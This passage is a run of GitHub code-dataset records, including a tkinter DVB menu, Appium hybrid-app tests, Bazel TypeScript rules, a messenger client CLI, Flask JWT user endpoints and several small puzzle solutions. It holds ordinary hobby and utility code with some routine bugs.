分割线\nfmenu2.add_command(label='dvbs2_19_symbol_rate_step')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_22_phase_distortion_test')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_23_amplitude_distortion_test')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_24_symbol_err_rate')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_25_signal_acquisition_frequency_range')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_26_signal_tracking_frequency_range')\n\n\n\nfmenu3 = Menu(window)\nfmenu3.add_separator()\nfmenu3.add_command(label='菜单3-1')\nfmenu3.add_separator()\nfmenu3.add_command(label='菜单3-2')\n\nfmenu4 = Menu(window) # 创建了第四个菜单容器,add四个菜单容器,实现多级子菜单\nfmenu4_1 = Menu(window)\nfmenu4_1.add_command(label='菜单4-子菜单1-1')\nfmenu4_1.add_command(label='菜单4-子菜单1-2')\nfmenu4_2 = Menu(window)\nfmenu4_2.add_command(label='菜单4-子菜单2-1')\nfmenu4_2.add_command(label='菜单4-子菜单2-2')\nfmenu4_3 = Menu(window)\nfmenu4_3.add_command(label='菜单4-子菜单3-1')\nfmenu4_3.add_command(label='菜单4-子菜单3-2')\nfmenu4_4 = Menu(window)\nfmenu4_4.add_command(label='菜单4-子菜单4-1')\nfmenu4_4.add_command(label='菜单4-子菜单4-2')\n\n# 将fmenu4_1,fmenu4_2,fmenu4_3,fmenu4_4四个菜单容器加入fmenu4菜单容器中\n\nfmenu4.add_cascade(label='菜单4-子菜单1', menu=fmenu4_1)\nfmenu4.add_cascade(label='菜单4-子菜单2', menu=fmenu4_2)\nfmenu4.add_cascade(label='菜单4-子菜单3', menu=fmenu4_3)\nfmenu4.add_cascade(label='菜单4-子菜单4', menu=fmenu4_4)\n\n# 将“fmenu1、fmenu2、fmenu3、fmenu4”四个菜单容器加入顶级菜单中,并设置该菜单容器的label\n\nmenubar.add_cascade(label='DVB-S', menu=fmenu1)\nmenubar.add_cascade(label='DVB-S2', menu=fmenu2)\nmenubar.add_cascade(label='DVB-T', menu=fmenu3)\nmenubar.add_cascade(label='DVB-T2', menu=fmenu4)\n\nwindow['menu'] = menubar # 设置窗口的菜单为menubar\n\nwindow.mainloop()\n","repo_name":"invictus86/front_end_code","sub_path":"ekt_gui/configuration_tool.py","file_name":"configuration_tool.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24590225226","text":"# 2583번\n\nimport sys\nsys.setrecursionlimit(100000)\n\ndx = [-1, 0, 1, 0]\ndy = [0, -1, 0, 1]\n\nM, N, K = map(int, input().split())\n\nm = [[0] * N for _ in range(M)]\n\n\ndef dfs(x, y):\n # if m[x][y] == 1:\n # return\n global cnt\n m[x][y] = cnt + 1\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if check(nx, ny) and m[nx][ny] == 0:\n\n cnt += 1\n dfs(nx, ny)\n m[nx][ny] = max(cnt, m[nx][ny])\n return cnt\n\n\ndef check(x, y):\n return 0 <= x < M and 0 <= y < N\n\n\nfor _ in range(K):\n x1, y1, x2, y2 = map(int, input().split())\n\n for i in range(y1, y2):\n for j in range(x1, x2):\n # print(i, j)\n m[i][j] = 1\n\nanswer = 0\ncnt = 0\narr = []\nfor i in range(M):\n for j in range(N):\n if m[i][j] == 0:\n\n cnt = 0\n answer += 1\n arr.append(dfs(i, j) + 1)\n\nprint(answer)\narr = sorted(arr)\nfor a in arr:\n print(a, end=' ')\n","repo_name":"lecocococo/Algorithm-PS","sub_path":"DFS/2583.py","file_name":"2583.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"5305531917","text":"\"\"\"\n======================\nAuthor: 柠檬班-小简\nTime: 2020/9/18 19:34\nProject: py30-app\nCompany: 湖南零檬信息技术有限公司\n======================\n\"\"\"\n\"\"\"\n混合应用:原生控件(xml) + html\n识别原生控件:app定位工具\nhtml识别:浏览器的F12\n\n打开手机上 开发者选项 - 边界布局。如果是原生控件,都会框起来。\n\nandroid.webkit.WebView: 里面放的就是html\n\n1、识别html\n 并且你要从原生控件的操作,切换到html的操作。\n\n2、开启webview的调试模式。\n http://testingpai.com/article/1595507219486\n\n3、得到当前所有的contexts。 driver.contexts\n\n4、切换:driver.switch_to.context。 一定会有NATIVE_APP, 可能还会有webview\n\n================ html - web自动化 =================\n5、元素识别工具:\n 元素定位怎么看? -- uc-devtools\n\n6、驱动程序:chromedriver/安卓系统的webview版本\n 版本怎么看?\n 怎么得到手机的webview版本:\n 1、工具:uc-devtools https://dev.ucweb.com/docs/pwa/docs-zh/xy3whu\n 进入到html里面,然后在包名后面的括号里,有webview的版本号。\n 2、chrome浏览器里输入:chrome://inspect\n 3、appium server的日志显示。\n [2020-09-18 09:03:44][Chromedriver] Webview version: 'Chrome/68.0.3440.70'\n \n 在启动参数里,指定chromedriver获取路径:\n \"chromedriverExecutableDir\":\"D:\\ChromeDrivers\\chrome67-69\"\n\n\"\"\"\nfrom appium import webdriver\nfrom appium.webdriver.common.mobileby import MobileBy\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom time import sleep\n\n# 在andriod 7.1.2 上面打开柠檬班app\ndesired_caps = {\n \"automationName\": \"UiAutomator2\",\n \"platformName\": \"Android\",\n \"platformVersion\": \"7.1.2\",\n \"deviceName\": \"huawei\",\n \"appPackage\":\"com.lemon.lemonban\",\n \"appActivity\":\"com.lemon.lemonban.activity.WelcomeActivity\",\n \"noReset\":True,\n \"chromedriverExecutableDir\":\"D:\\ChromeDrivers\\chrome67-69\"\n}\n\n# 跟appium建立连接,然后再把启动参数发过去。\ndriver = webdriver.Remote('http://127.0.0.1:4723/wd/hub',desired_caps)\n\n\n# 选择柠檬社区\nloc = (MobileBy.ANDROID_UIAUTOMATOR,'text(\"柠檬社区\")')\nWebDriverWait(driver,30).until(EC.visibility_of_element_located(loc))\n\n# 获取所有的context\ncons = driver.contexts\nprint(\"在进入混合页面之前,所有的上下文:\",cons)\n\ndriver.find_element(*loc).click()\n\n# 等待webview可见。\nloc = (MobileBy.CLASS_NAME,'android.webkit.WebView')\nWebDriverWait(driver,30).until(EC.visibility_of_element_located(loc))\nsleep(1)\n\n# 获取所有的context\ncons = driver.contexts\nprint(\"所有的上下文:\",cons)\n\n# # 切换\ndriver.switch_to.context('WEBVIEW_com.lemon.lemonban')\n\n# ========== html自动化 ======== chromedriver驱动程序是否与webview版本匹配? ===========\n\nloc = (MobileBy.XPATH, '//h2//a[contains(text(),\"2020 最新柠檬班交友群来了!\")]')\nWebDriverWait(driver,30).until(EC.visibility_of_element_located(loc))\ndriver.find_element(*loc).click()","repo_name":"zmh19941223/test_lenmon30","sub_path":"4-app自动化测试/py30_20200918_h5混合应用自动化+微信小程序自动化/day5/H5混合应用自动化.py","file_name":"H5混合应用自动化.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1095899886","text":"load(\n \"@com_vistarmedia_rules_js//js/private:rules.bzl\",\n \"compile_deps\",\n \"js_lib_attr\",\n \"node_attr\",\n \"runtime_deps\",\n)\nload(\"//ts/private:flags.bzl\", \"tsc_attrs\", \"tsc_flags\")\n\nts_src_type = [\".ts\", \".tsx\", \".srcjar\"]\nts_def_type = [\".d.ts\"]\n\ndef _transitive_ts_defs(ctx):\n return depset(\n order = \"postorder\",\n direct = ctx.files.ts_defs,\n transitive = [getattr(dep, \"ts_defs\", depset()) for dep in ctx.attr.deps],\n )\n\ndef _plugin_path(plugin):\n return plugin.label.package\n\ndef _compile(ctx, srcs):\n bin_dir = ctx.configuration.bin_dir.path\n ts_defs = _transitive_ts_defs(ctx)\n outputs = []\n\n output_jsar_format = ctx.attr.output_format == \"jsar\"\n output_src_format = not output_jsar_format\n declaration = ctx.attr.declaration\n\n lib = depset(transitive = [\n compile_deps(ctx.attr.deps),\n runtime_deps(ctx.attr.transform_before + ctx.attr.transform_after),\n runtime_deps([ctx.attr._tslib, ctx.attr._typescript]),\n ])\n\n # For each input file, expect it to create a corresponding .js and .d.ts\n # file. If the source is a .d.ts file, pass it to the parser, but don't\n # expect an output file\n for src in srcs:\n basename = src.basename\n\n name = basename[:basename.rfind(\".\")]\n js_src = name + \".js\"\n if output_src_format:\n outputs.append(ctx.actions.declare_file(js_src, sibling = src))\n\n if declaration and output_src_format:\n ts_def = name + \".d.ts\"\n outputs.append(ctx.actions.declare_file(ts_def, sibling = src))\n\n if output_jsar_format:\n jsar_output = ctx.actions.declare_file(ctx.label.name + \".jsar\")\n outputs.append(jsar_output)\n jsar_name = jsar_output.path\n\n # We will either be building source files (relative to '.'), or generated\n # files (relative to the bazel-bin directory). Since it's not possible to\n # construct a typescript declaration which mixed the two files, we will assume\n # our source files are relative to '/' unless the first file starts with the\n # bazel-bin directory, then use that as the source root.\n #\n # When tsc tries to infer the source root directory, it will take the longest\n # prefix shared by all source files, which is almost always the path to the\n # module where tsc as been invoked. It likely works well for\n # compile-everything-at-once projects, but would put everything at the top\n # level in a scheme that compiles each module independently.\n src_root = \"/\"\n if srcs and srcs[0].path.startswith(bin_dir):\n src_root = bin_dir + \"/\"\n\n tsc_args = ctx.actions.args()\n tsc_args.add(\"--rootDir\", \"/\")\n tsc_args.add(\"--outDir\", bin_dir if output_src_format else \"/\")\n\n if declaration:\n tsc_args.add(\"--declaration\")\n\n tsc_flags(tsc_args, ctx.attr)\n tsc_args.add_all(ts_defs)\n tsc_args.add_all(srcs)\n\n tsc_args_file = ctx.actions.declare_file(ctx.label.name + \".tsc_args\")\n ctx.actions.write(\n output = tsc_args_file,\n content = tsc_args,\n )\n\n libs = ctx.actions.args().add_all(lib)\n lib_paths_file = ctx.actions.declare_file(ctx.label.name + \".lib_paths\")\n ctx.actions.write(\n output = lib_paths_file,\n content = libs,\n )\n\n # Provides the compiler a set of strict (non-transitive) dependencies for this\n # target. 
Maps each label to its jsar\n deps = [[str(dep.label), dep.cjsar.path] for dep in ctx.attr.deps]\n\n tsc_opts = struct(\n label = str(ctx.label),\n args_file = tsc_args_file.path,\n lib_file = lib_paths_file.path,\n deps = deps,\n src_root = src_root,\n package = ctx.attr.package or ctx.label.package,\n strict_deps = ctx.attr.strict_deps,\n ignored_strict_deps = [str(d.label) for d in ctx.attr.ignored_strict_deps],\n transformers = struct(\n before = [_plugin_path(t) for t in ctx.attr.transform_before],\n after = [_plugin_path(t) for t in ctx.attr.transform_after],\n ),\n output_jsar = jsar_name if output_jsar_format else None,\n )\n\n flag_file = ctx.actions.declare_file(ctx.label.name + \".args\")\n ctx.actions.write(\n output = flag_file,\n content = tsc_opts.to_json(),\n )\n\n inputs = depset(\n direct = srcs + [flag_file, tsc_args_file, lib_paths_file],\n transitive = [lib, ts_defs],\n )\n\n ctx.actions.run(\n executable = ctx.executable._tsc,\n arguments = [\"--flagfile=\" + flag_file.path],\n inputs = inputs,\n tools = [ctx.executable._node],\n outputs = outputs,\n mnemonic = \"CompileTS\",\n execution_requirements = {\"supports-workers\": \"1\"},\n )\n\n if output_jsar_format:\n return struct(\n files = depset([jsar_output]),\n jsar = jsar_output,\n cjsar = jsar_output,\n runtime_deps = runtime_deps(ctx.attr.deps),\n compile_deps = compile_deps(ctx.attr.deps),\n )\n else:\n runfiles = ctx.runfiles(collect_default = True)\n return struct(\n files = depset(outputs),\n ts_defs = ts_defs,\n runfiles = runfiles,\n )\n\ndef _ts_srcs_impl(ctx):\n return _compile(ctx, ctx.files.srcs)\n\ndef _ts_src_impl(ctx):\n return _compile(ctx, ctx.files.src)\n\ndef _tsc_config_impl(ctx):\n return struct(tsc_flags = ctx.attr)\n\nattrs = dict(tsc_attrs.items() + {\n \"ts_defs\": attr.label_list(allow_files = ts_def_type),\n \"deps\": js_lib_attr,\n \"transform_before\": js_lib_attr,\n \"transform_after\": js_lib_attr,\n \"tsc_config\": attr.label(mandatory = False, providers = [\"tsc_flags\"]),\n \"strict_deps\": attr.bool(default = False, doc = \"Enable strict deps -- unsued \" +\n \"dependencies and transitive imports will fail the target.\"),\n \"ignored_strict_deps\": attr.label_list(default = [], doc = \"Dependencies \" +\n \"which should not be checked for strictness\"),\n \"output_format\": attr.string(\n default = \"source\",\n values = [\"source\", \"jsar\"],\n doc = \"Determines if the output will be a source files as a js_library \" +\n \"or a packaged jsar. The default is source, as its far easier to \" +\n \"debug despite a slight increase in compilation time. Note that \" +\n \"in situations where the output files of a ts_src compilation \" +\n \"cannot be known at analyze time, this can be a handy escape \" +\n \"hatch\",\n ),\n \"package\": attr.string(\n doc = \"Optionally rewrite the package the source gets compiled to. 
See \" +\n \"rules_js for more information\",\n ),\n \"_node\": node_attr,\n \"_tsc\": attr.label(\n default = Label(\"@io_bazel_rules_ts//ts/toolchain:tsc\"),\n executable = True,\n cfg = \"host\",\n ),\n \"_tslib\": attr.label(default = Label(\"@tslib//:lib\")),\n \"_typescript\": attr.label(default = Label(\"@typescript//:lib\")),\n}.items())\n\nts_srcs = rule(\n _ts_srcs_impl,\n attrs = dict(attrs.items() + {\n \"srcs\": attr.label_list(allow_files = ts_src_type),\n \"declaration\": attr.bool(default = True),\n }.items()),\n)\n\nts_src = rule(\n _ts_src_impl,\n attrs = dict(attrs.items() + {\n \"src\": attr.label(allow_single_file = ts_src_type),\n \"declaration\": attr.bool(default = False),\n }.items()),\n)\n\ntsc_config = rule(_tsc_config_impl, attrs = tsc_attrs)\n","repo_name":"vistarmedia/rules_ts","sub_path":"ts/private/rules.bzl","file_name":"rules.bzl","file_ext":"bzl","file_size_in_byte":7521,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"27974952853","text":"import sys\nfrom decorator import Log, LOGGER\nsys.path.append('../')\n\n\nclass ClientCLI:\n def __init(self, transport):\n self.transport = transport\n self.db_session = transport.database.create_session()\n\n # Поток отправки и взаимодействия с пользователем\n def sender_func(self):\n try:\n while True:\n self.print_help()\n while True:\n command = input('Введите команду: ')\n # Если отправка сообщения - соответствующий метод\n if command == 'message':\n self.sender_message(my_cl)\n\n # Вывод помощи\n elif command == 'help':\n self.print_help()\n\n # Выход. Отправляем сообщение серверу о выходе.\n elif command == 'exit':\n try:\n self.transport.stop()\n except:\n pass\n print('Спасибо за использование нашего сервиса!')\n LOGGER.info('Завершение работы по команде пользователя.')\n # Задержка неоходима, чтобы успело уйти сообщение о выходе\n time.sleep(0.5)\n sys.exit(0)\n\n # Список контактов\n elif command == 'contacts':\n contacts_list = self.db_session.get_contacts()\n for contact in contacts_list:\n print(contact)\n\n # Редактирование контактов\n elif command == 'edit':\n self.edit_contacts()\n\n # история сообщений.\n elif command == 'history':\n self.print_history()\n\n else:\n print('Команда не распознана, попробойте снова. help - вывести поддерживаемые команды.')\n\n except (ConnectionResetError, ConnectionError, ConnectionAbortedError):\n LOGGER.error(f'Соединение с сервером {self.transport.server_address} было потеряно.')\n sys.exit(1)\n\n # Функция выводящяя справку по использованию.\n def print_help(self):\n print('Поддерживаемые команды:')\n print('message - отправить сообщение. Кому и текст будет запрошены отдельно.')\n print('history - история сообщений')\n print('contacts - список контактов')\n print('edit - редактирование списка контактов')\n print('help - вывести подсказки по командам')\n print('exit - выход из программы')\n\n # Функция выводящяя историю сообщений\n def print_history(self):\n ask = input('Показать входящие сообщения - in, исходящие - out, все - просто Enter: ')\n #with database_lock:\n if ask == 'in':\n history_list = self.db_session.get_history(to_who=self.transport.client_name)\n for message in history_list:\n print(f'\\nСообщение от пользователя: {message[0]} от {message[3]}:\\n{message[2]}')\n elif ask == 'out':\n history_list = self.db_session.get_history(from_who=self.transport.client_name)\n for message in history_list:\n print(f'\\nСообщение пользователю: {message[1]} от {message[3]}:\\n{message[2]}')\n else:\n history_list = self.db_session.get_history()\n for message in history_list:\n print(f'\\nСообщение от пользователя: {message[0]}, пользователю {message[1]} от {message[3]}\\n{message[2]}')\n\n # Функция изменеия контактов\n def edit_contacts(self):\n ans = input('Для удаления введите del, для добавления add: ')\n if ans == 'del':\n edit = input('Введите имя удаляемного контакта: ')\n if self.db_session.check_contact(edit):\n self.db_session.del_contact(edit)\n else:\n LOGGER.error('Попытка удаления несуществующего контакта.')\n elif ans == 'add':\n # Проверка на возможность такого контакта\n edit = input('Введите имя создаваемого контакта: ')\n if self.db_session.check_user(edit):\n self.db_session.add_contact(edit)\n with self.transport.lock:\n try:\n self.transport.add_contact(edit)\n print('Удачное создание контакта.')\n except RuntimeError:\n LOGGER.error('Не удалось отправить информацию на сервер.')\n\n def sender_message(self):\n dest = input('Введите имя получателя или \\'!!!\\' для завершения 
работы: ')\n if dest == '!!!':\n return\n # Проверим, что получатель существует\n if not self.db_session.check_user(dest):\n LOGGER.error(f'Попытка отправить сообщение незарегистрированому получателю: {dest}')\n return\n message = input('Введите сообщение для отправки или \\'!!!\\' для завершени�� работы: ')\n if message == '!!!':\n return\n self.transport.send_message(message, dest)","repo_name":"TatianaGrishechkina/python_DBPyQT","sub_path":"Lesson_5_Grishechkina/client_part/client_cli.py","file_name":"client_cli.py","file_ext":"py","file_size_in_byte":6317,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39584656445","text":"import datetime\r\nimport traceback\r\nfrom werkzeug.security import safe_str_cmp\r\nfrom flask_restful import Resource, reqparse\r\nfrom flask import request, make_response, render_template\r\nfrom flask_jwt_extended import (\r\n create_access_token,\r\n create_refresh_token,\r\n get_jwt_identity,\r\n jwt_refresh_token_required,\r\n jwt_required,\r\n get_raw_jwt,\r\n fresh_jwt_required,\r\n)\r\n\r\nfrom marshmallow import ValidationError\r\nfrom models.user import UserModel\r\nfrom models.confirmation import ConfirmationModel\r\nfrom blacklist import BLACKLIST\r\n\r\nfrom schemas.user import UserSchema\r\nfrom libs.mailgun import MailGunException\r\nfrom libs.strings import gettext\r\n\r\nuser_schema = UserSchema()\r\n\r\n\r\nclass UserRegister(Resource):\r\n @classmethod\r\n def post(cls):\r\n user_json = request.get_json()\r\n user = user_schema.load(user_json)\r\n\r\n if UserModel.find_by_username(user[\"username\"]):\r\n return {\"message\": gettext(\"user_username_exists\")}, 400\r\n\r\n if UserModel.find_by_email(user[\"email\"]):\r\n return {\"message\": gettext(\"user_email_exists\")}, 400\r\n user = UserModel(**user)\r\n\r\n try:\r\n user.save_to_db()\r\n confirmation = ConfirmationModel(user.id)\r\n confirmation.save_to_db()\r\n user.send_confirmation_email()\r\n return {\"message\": gettext(\"user_registered\")}, 201\r\n except MailGunException as e:\r\n user.delete_from_db() # rollback\r\n return {\"message\": str(e)}, 500\r\n except: # failed to save user to db\r\n traceback.print_exc()\r\n user.delete_from_db() # rollback\r\n return {\"message\": gettext(\"user_error_creating\")}, 500\r\n\r\n\r\nclass User(Resource):\r\n\r\n @classmethod\r\n def get(cls, user_id):\r\n user = UserModel.find_by_id(user_id)\r\n\r\n if not user:\r\n return {\"message\": gettext(\"user_not_found\")}, 404\r\n\r\n return user_schema.dump(user), 200\r\n\r\n @classmethod\r\n def delete(cls, user_id):\r\n user = UserModel.find_by_id(user_id)\r\n if not user:\r\n return {\"message\": gettext(\"user_not_found\")}, 404\r\n\r\n user.delete_from_db()\r\n\r\n return {\"message\": gettext(\"user_deleted\")}, 200\r\n\r\n\r\nclass UserLogin(Resource):\r\n\r\n @classmethod\r\n def post(cls):\r\n try:\r\n user_data = user_schema.load(request.get_json(), partial=(\"email\",))\r\n except ValidationError as err:\r\n return err.messages, 400\r\n\r\n user = UserModel.find_by_username(user_data['username'])\r\n\r\n if user and safe_str_cmp(user.password, user_data['password']):\r\n confirmation = user.most_recent_confirmation\r\n if confirmation and confirmation.confirmed:\r\n expires = datetime.timedelta(seconds=3600)\r\n access_token = create_access_token(\r\n identity=user.id, expires_delta=expires, fresh=True\r\n )\r\n refresh_token = create_refresh_token(user.id)\r\n return {\"access_token\": access_token, \"refresh_token\": refresh_token}, 200\r\n return {'message': gettext(\"user_not_confirmed\").format(user.email)}, 400\r\n\r\n return {\"message\": gettext(\"user_invalid_credentials\")}, 401\r\n\r\n\r\nclass UserLogout(Resource):\r\n @jwt_required\r\n def post(self):\r\n jti = get_raw_jwt()[\"jti\"] # jti is \"JWT ID\", a unique identifier for a JWT.\r\n user_id = get_jwt_identity()\r\n BLACKLIST.add(jti)\r\n return {\"message\": gettext(\"user_logged_out\").format(user_id)}, 200\r\n\r\n\r\nclass TokenRefresh(Resource):\r\n @jwt_refresh_token_required\r\n def post(self):\r\n current_user = get_jwt_identity()\r\n expires = datetime.timedelta(seconds=3600)\r\n new_token = 
create_access_token(\r\n            identity=current_user, expires_delta=expires, fresh=False\r\n        )\r\n        return {\"access_token\": new_token}, 200\r\n\r\n\r\nclass SetPassword(Resource):\r\n    @classmethod\r\n    @fresh_jwt_required\r\n    def post(cls):\r\n        user_json = request.get_json()\r\n        user_data = user_schema.load(user_json)\r\n        user = UserModel.find_by_username(user_data[\"username\"])\r\n\r\n        if not user:\r\n            return {\"message\": gettext(\"user_not_found\")}, 400\r\n\r\n        user.password = user_data[\"password\"]\r\n        user.save_to_db()\r\n\r\n        return {\"message\": gettext(\"user_password_updated\")}, 201\r\n\r\n\r\n# class UserConfirm(Resource):\r\n#\r\n#     @classmethod\r\n#     def get(cls, user_id: id):\r\n#         user = UserModel.find_by_id(user_id)\r\n#         if not user:\r\n#             return {\"message\": USER_NOT_FOUND}, 404\r\n#         user.activated = True\r\n#         user.save_to_db()\r\n#         headers = {\"Content-Type\": \"text/html\"}\r\n#         return make_response(render_template(\"confirmation_page.html\", email=user.username), 200, headers)\r\n","repo_name":"saikatbhuiyan/flask-store-api","sub_path":"resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"37908512067","text":"\nimport numpy as np\n\nfrom astropy.io import fits\n\ndef find_nearest(times, index_times) :\n \n indices = []\n for time in index_times :\n index = (np.abs(times - time)).argmin()\n indices.append(index)\n \n return indices\n\ndef open_cutout(infile, shape=False, simple=False) :\n \n with fits.open(infile) as hdu :\n if simple :\n data = hdu[0].data\n shape = data.shape\n else :\n data = hdu[0].data\n shape = data.shape\n hdr = hdu[0].header\n redshift = hdr['Z']\n exptime = hdr['EXPTIME']\n area = hdr['AREA']\n photfnu = hdr['PHOTFNU']\n scale = hdr['SCALE']\n \n if simple :\n return data, shape\n else :\n return data, shape, redshift, exptime, area, photfnu, scale\n","repo_name":"camlawlorforsyth/CASTOR","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"16067778067","text":"'''\nGiven an n x n matrix and a number x, find the position of x in the matrix if it is present in it. \nOtherwise, print “Not Found”. In the given matrix, every row and column is sorted in increasing order. \nThe designed algorithm should have linear time complexity. \n\nExample: \n\nInput: mat[4][4] = { {10, 20, 30, 40},\n {15, 25, 35, 45},\n {27, 29, 37, 48},\n {32, 33, 39, 50}};\n x = 29\nOutput: Found at (2, 1)\nExplanation: Element at (2,1) is 29\n\nInput : mat[4][4] = { {10, 20, 30, 40},\n {15, 25, 35, 45},\n {27, 29, 37, 48},\n {32, 33, 39, 50}};\n x = 100\nOutput : Element not found\nExplanation: Element 100 is not found\n'''\ndef search(M, x):\n R, C = len(M), len(M[0])\n i, j = 0, C - 1\n while j >= 0 and i < R:\n if M[i][j] == x:\n return (i, j)\n elif M[i][j] < x:\n i += 1\n else:\n j -= 1\n return (-1, -1)\n\nmat = [[10, 20, 30, 40],\n [15, 25, 35, 45],\n [27, 29, 37, 48],\n [32, 33, 39, 50]]\n\nprint(search(mat, 34))","repo_name":"embydextrous/Interview","sub_path":"matrix/27-searchInRowWiseAndColumnWiseSortedMatris.py","file_name":"27-searchInRowWiseAndColumnWiseSortedMatris.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"23619468868","text":"from api.data.base import BaseQuery\n\nclass TestQuery(BaseQuery):\n TABLE_NAME = 'test_table'\n def __init__(self, db_instance):\n super().__init__(db_instance, self.TABLE_NAME)\n\n def test_query(self):\n query = '''\n SELECT\n *\n FROM\n test_table;\n '''\n \n self.execute(query)\n return self.fetch()\n","repo_name":"RKelley1/Twitter-Weather-Map","sub_path":"api/data/not_a_test.py","file_name":"not_a_test.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"30904758282","text":"#Number Guessing Game Objectives:\n\n# Include an ASCII art logo.\n# Allow the player to submit a guess for a number between 1 and 100.\n# Check user's guess against actual answer. Print \"Too high.\" or \"Too low.\" depending on the user's answer. \n# If they got the answer correct, show the actual answer to the player.\n# Track the number of turns remaining.\n# If they run out of turns, provide feedback to the player. \n# Include two different difficulty levels (e.g., 10 guesses in easy mode, only 5 guesses in hard mode).\nimport random\n\nprint(\"Welcome to the guessing game!\")\ndifficultyLevel = input(\"Would you like easy or hard mode? \")\ndifficultyLevel = difficultyLevel.lower()\nif(difficultyLevel == \"easy\"):\n lives = 10\nelif(difficultyLevel == \"hard\"):\n lives = 5\n\nnumber = random.randint(1, 100)\ncorrect = False\n\nprint(\"Choose a number between 1 and 100\")\n\nwhile lives >= 0 and correct == False:\n print(f\"You currently have {lives} lives left.\\n\")\n guess = int(input(\"What is your guess? \"))\n if(guess > number):\n print(\"Your guess was too high.\")\n lives -= 1\n elif(guess < number):\n print(\"Your guess was too low.\")\n lives -= 1\n elif(guess == number):\n print(\"Your guess was correct! You win!\")\n correct = True\n elif(lives == 0):\n print(\"You are out of lives. You loose!\")\n ","repo_name":"NoahThomlison/100-days-of-python","sub_path":"day-12/guessingGame.py","file_name":"guessingGame.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"26633522487","text":"from math import sin, cos, radians\n\nfrom collections import namedtuple\n\n# N\n# W + E\n# S\n\n\ndef rotate(d, theta):\n x, y = d\n st = sin(radians(theta))\n ct = cos(radians(theta))\n\n return (\n x * ct - y * st,\n x * st + y * ct\n )\n\n\ndef add(a, b):\n return (a[0] + b[0], a[1] + b[1])\n\n\ndef sub(a, b):\n return (a[0] - b[0], a[1] - b[1])\n\n\ndef muls(a, scalar):\n return (a[0] * scalar, a[1] * scalar)\n\n\ndef rotate_around(point, around, theta):\n translated = sub(point, around)\n\n rotated = rotate(translated, theta)\n\n return add(rotated, around)\n\n\ndef parse_step(line):\n return (line[0], int(line[1:]))\n\n\nState = namedtuple(\"State\", \"pos direction\")\n\nDIRECTIONS = {\n \"N\": (0, 1),\n \"S\": (0, -1),\n \"E\": (1, 0),\n \"W\": (-1, 0)\n}\n\n\ndef step(state, step):\n typ, amount = step\n\n if typ in DIRECTIONS:\n return State(add(state.pos, muls(DIRECTIONS[typ], amount)), state.direction)\n\n if typ == \"F\":\n return State(add(state.pos, muls(state.direction, amount)), state.direction)\n\n rot_dir = 1 if typ == \"L\" else -1\n\n return State(state.pos, rotate(state.direction, amount * rot_dir))\n\n\ndef step_with_waypoint(state, step):\n typ, amount = step\n\n if typ in DIRECTIONS:\n return State(state.pos, add(state.direction, muls(DIRECTIONS[typ], amount)))\n\n if typ == \"F\":\n return State(add(state.pos, muls(state.direction, amount)), state.direction)\n\n rot_dir = 1 if typ == \"L\" else -1\n\n return State(state.pos, rotate(state.direction, amount * rot_dir))\n\n\nINPUT = \"input.txt\"\n\nwith open(INPUT, \"r\") as f:\n STEPS = [parse_step(line.strip()) for line in f.readlines()]\n\n\ncur = State((0, 0), (1, 0))\n\nfor s in STEPS:\n cur = step(cur, s)\n print(cur)\n\npos = cur.pos\n\nprint(abs(pos[0])+abs(pos[1]))\n\n\ncur = State((0, 0), (10, 1))\n\n\nfor s in STEPS:\n cur = step_with_waypoint(cur, s)\n print(cur)\n\npos = cur.pos\n\nprint(abs(pos[0])+abs(pos[1]))\n","repo_name":"a-ungurianu/advent-of-code-2020","sub_path":"day-12/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"43214900212","text":"from decimal import Decimal\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import Address\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import Contact\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import Country\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import EstimatedArrivalTransportEvent\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import PartyIdentification\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import PartyName\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import Period\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import RailTransport\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import ReceiverParty\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import SenderParty\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import SourceIssuerParty\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import StatusLocation\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import TransportMeans\nfrom ubl.models.common.ubl_common_aggregate_components_2_1 import 